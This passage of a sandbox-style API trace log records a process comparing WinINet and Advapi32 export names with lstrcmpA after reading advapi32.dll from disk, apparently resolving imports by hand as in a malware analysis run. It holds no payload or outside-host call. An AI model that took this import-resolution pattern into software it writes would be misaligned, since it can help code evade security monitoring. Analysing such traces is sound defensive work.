lpString2="AppCacheCloseHandle") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0116.037] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0116.038] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0116.038] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0116.039] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0116.040] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0116.041] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0116.041] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0116.041] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0116.041] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0116.041] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0116.041] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0116.041] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0116.041] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0116.041] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0116.041] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0116.041] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0116.041] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0116.041] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0116.042] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0116.042] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0116.042] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0116.042] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0116.042] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0116.042] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0116.056] GetProcessHeap () returned 0x460000 [0116.056] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4071040 | out: hHeap=0x460000) returned 1 [0116.263] GetProcessHeap () returned 0x460000 [0116.264] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x479170 [0116.266] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0116.266] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0116.267] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0116.267] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0116.267] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0116.267] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0116.267] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0116.267] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0116.267] GetProcessHeap () returned 0x460000 [0116.268] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xa3ef0) returned 0x2cb2010 [0116.270] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0116.270] ReadFile (in: hFile=0x140, lpBuffer=0x2cb2010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2cb2010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0116.281] CloseHandle (hObject=0x140) returned 1 [0116.281] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0116.281] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0116.281] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0116.281] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0116.281] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0116.281] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0116.281] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0116.281] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0116.281] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0116.281] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0116.281] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0116.282] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0116.282] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.283] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0116.284] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0116.285] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0116.286] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", 